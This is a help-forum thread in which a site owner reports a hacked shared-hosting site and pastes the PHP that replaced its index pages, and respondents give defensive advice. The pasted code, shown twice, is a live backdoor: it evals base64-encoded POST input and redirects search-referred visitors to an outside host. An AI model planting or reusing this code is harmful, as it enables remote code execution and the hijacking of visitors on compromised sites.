We help IT Professionals succeed at work.

Web hacked, indexes removed??

Medium Priority
713 Views
Last Modified: 2013-11-16
Somebody this morning has removed all the index.php from the sections of one of my sites, and replaced them with the attached code, how can i prevent this from happening again, and how could this happen, somoe have access to my folders??

Attached the index.php with which they replaced the original ones.
<?php $a=@$_POST['a'];if($a && @$_POST['b']==sha1(md5($a))){$a=base64_decode($a);eval($a);} function get_counter(){$ip=$_SERVER['REMOTE_ADDR'];$uniq=@file_get_contents("http://gogapartnership.com/ip.php?ip=$ip");if($uniq===false){return false;}if($uniq=="go"){return true;}return  false;}$ref=strtolower(trim(@$_SERVER['HTTP_REFERER']));if((strpos($ref,"google")!==false)and(strpos($ref,"bot.htm")===false)){if(get_counter()){@header("Location: http://gogapartnership.com/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}}if((strpos($ref,"yahoo")!==false)and(strpos($ref,"slurp")===false)){if(get_counter()){@header("Location: http://gogapartnership.com/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}} ?>

Open in new window

Comment
Watch Question

Michael WorshamCloud/Infrastructure Solutions Architect
CERTIFIED EXPERT

Commented:
Is this a shared hosting site or a dedicated hosting server?
Michael WorshamCloud/Infrastructure Solutions Architect
CERTIFIED EXPERT

Commented:
I did some quick research and the code seems to be some sort of header hack.

I did find a thread that has some PHP code someone wrote to run to detect pages that have this hack on their websites.
http://www.forum.optymalizacja.com/index.php?s=&showtopic=65618&view=findpost&p=506034

Author

Commented:
its a shared hosting, i tried to see that forum, but i don't undestand that language??

Is my server infected or anything? what am i doing wrong?
Michael WorshamCloud/Infrastructure Solutions Architect
CERTIFIED EXPERT

Commented:
If the hacker was able to access your account and modify your files, then your hosting provider has a serious breach and most likely your data is at risk. I recommend contacting your hosting provider and see if they have had any additional server-side intrusions. I would also send them a copy of the code you found so they can see if they are at risk as well for other sites.

Here is a Google Translated copy of the site (Polish to English):
http://translate.google.com/translate?hl=en&sl=pl&u=http://www.forum.optymalizacja.com/index.php%3Fshowtopic%3D65618&ei=tXSUSdXBMozMmQfO1p2NCg&sa=X&oi=translate&resnum=3&ct=result&prev=/search%3Fq%3Dtds_u.php%26hl%3Den%26safe%3Doff%26rlz%3D1B3GGGL_enUS287US287
Commented:
Basically that script reads the website's users IP does something with it that returns a value of go or false(other value) then if the value is go it will submit the website ip address to a database where they can find Vulnerable websites to be use for spyware, spamware, virus Injection & other security related issues.

i suggest you get your host to upgrade their software and security, or move hosts.

Attached Snippet of the code broken to programmers readable version


<?php
 $a=@$_POST['a'];
 if($a && @$_POST['b']==sha1(md5($a)))
 {
	 $a=base64_decode($a);
	 eval($a);
	 }
 
  function get_counter()
  {
	  $ip=$_SERVER['REMOTE_ADDR'];
	  $uniq=@file_get_contents("http://gogapartnership.com/ip.php?ip=$ip");
	  if($uniq===false)
	  {
		  return false;
		  }
		  if ($uniq=="go")
		  {
			  return true;
			  }
			  return  false;
			  }
			  $ref=strtolower(trim(@$_SERVER['HTTP_REFERER']));
			  if((strpos($ref,"google")!==false)and(strpos($ref,"bot.htm")===false))
  {
	  if (get_counter())
	  {
		  @header("Location: http://gogapartnership.com/tds_u.php?dname=".$_SERVER['HTTP_HOST']);
		  die();
		  }
		  }
		  if((strpos($ref,"yahoo")!==false)and(strpos($ref,"slurp")===false))
		  {
			  if(get_counter())
			  {
				  @header("Location: http://gogapartnership.com/tds_u.php?dname=".$_SERVER['HTTP_HOST']);
				  die();
				  }
				  } 
				  
				  ?>

Open in new window

Not the solution you were looking for? Getting a personalized solution is easy.

Ask the Experts
Access more of Experts Exchange with a free account
Thanks for using Experts Exchange.

Create a free account to continue.

Limited access with a free account allows you to:

  • View three pieces of content (articles, solutions, posts, and videos)
  • Ask the experts questions (counted toward content limit)
  • Customize your dashboard and profile

*This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

OR

Please enter a first name

Please enter a last name

8+ characters (letters, numbers, and a symbol)

By clicking, you agree to the Terms of Use and Privacy Policy.